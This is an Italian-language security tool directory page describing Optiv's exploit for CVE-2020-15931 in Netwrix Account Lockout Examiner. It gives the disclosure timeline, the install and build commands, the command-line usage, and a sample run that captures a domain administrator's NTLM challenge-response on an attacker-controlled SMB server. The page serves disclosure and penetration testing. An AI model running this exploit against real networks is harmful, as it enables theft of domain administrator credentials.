Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-15931 — Netwrix Account Lockout Examiner 4.1 Vulnerabilità di divulgazione delle credenziali dell'account amministratore di dominio | Kitploit
Strumenti/GitHubGitHub/optiv/cve-2020-15931
Analisi delle VulnerabilitàExploitRaccolta InformazioniPenetration TestingRed Teaming
GitHuboptiv/cve-2020-15931

CVE-2020-15931

Netwrix Account Lockout Examiner 4.1 Vulnerabilità di divulgazione delle credenziali dell'account amministratore di dominio

Vedi Repository
2855 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-15931

Vulnerabilità di divulgazione delle credenziali dell'account amministratore di dominio in Netwrix Account Lockout Examiner 4.1

Panoramica della vulnerabilità

Netwrix Account Lockout Examiner (ALE) precedente alla versione 5.1 consente a un avversario remoto non autenticato di attivare una connessione verso un sistema controllato dall'attaccante e catturare la risposta challenge-response NTLMv1/v2 di un account con privilegi di amministratore di dominio. L'account amministratore di dominio sarebbe già configurato con il prodotto, come richiesto per l'installazione. Un avversario può sfruttare la vulnerabilità generando un singolo evento Kerberos Pre-Authentication Failed (Event ID 4771) su un domain controller.

Maggiori dettagli sulla vulnerabilità sono disponibili nel seguente Blog

image

Crediti

La vulnerabilità è stata scoperta sul campo da Robert Surace (@robsauce) e Daniel Min (@bigb0ss), consulenti di sicurezza Optiv, durante un security assessment. Individuata la CVE-2020-15931, Optiv ha contattato immediatamente Netwrix per divulgare responsabilmente la falla identificata.

Cronologia della divulgazione della vulnerabilità

  • 09 giugno 2020 – Vulnerabilità scoperta da Optiv
  • 15 giugno 2020 – Divulgata da Optiv al vendor
  • 14 luglio 2020 – Il vendor ha riconosciuto il problema e ha accettato di rilasciare la versione corretta
  • 23 luglio 2020 – Divulgata al CNA (MITRE Corporation)
  • 24 luglio 2020 – Il vendor ha rilasciato la versione corretta di Netwrix Account Lockout Examiner 5.1
  • 24 luglio 2020 – CVE-2020-15931 assegnata dal CNA (MITRE Corporation)
  • 13 agosto 2020 – Divulgata al pubblico
  • 30 ottobre 2020 – Punteggio base 7.5 High assegnato da NVD (National Vulnerability Database)

Script di exploit

Installazione

Lo script di exploit è stato sviluppato in golang. Installare le seguenti dipendenze:

root@kitploit:~
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

Utilizza inoltre smbserver.py di Impacket.

root@kitploit:~
pip install impacket

Infine, scaricare lo script di exploit e compilarlo.

root@kitploit:~
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go

Utilizzo

root@kitploit:~
$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

 
    Required:
    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    
    Optional:
    -h            Print this help menu

    Example:
    ./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith

Exploit

(Nota: al momento della stesura, questo attacco può essere individuato solo tramite un attacco di tipo blind-based. Questo perché è difficile determinare se l'organizzazione target utilizzi Netwrix Account Lockout Examiner sulla propria rete per controllare le autenticazioni degli account oppure no.)

root@kitploit:~
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC: 	10.10.0.2
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []

Riferimenti

Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931

Scarica lo strumento